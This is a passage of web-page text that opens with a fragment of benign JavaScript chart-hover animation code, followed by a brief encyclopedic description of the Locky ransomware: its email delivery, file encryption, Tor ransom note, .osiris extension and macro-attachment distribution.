this.label[1].attr({"font-weight": 800});
}
}, function () {
this.sector.animate({scale: [1, 1, this.cx, this.cy]}, 500);
if (this.label) {
this.label[0].animate({scale: 1}, 500);
this.label[1].attr({"font-weight": 400});
}
});
Example of Locky ransomware.
Locky is ransomware malware released in 2016. It is delivered by email and after infection will encrypt all files that match particular extensions.
After encryption, a message (displayed on the user's desktop) instructs them to download the Tor browser and visit a specific criminal-operated Web site for further information.
The current version, released in December 2016, utilizes the .osiris extension for encrypted files.
Many different distribution methods for Locky have been used since the ransomware was released. These distribution methods include Word and Excel attachments with malicious macros,DOCM attachments and zipped JS Attachments.
Read more: en.wikipedia.org/wiki/Locky
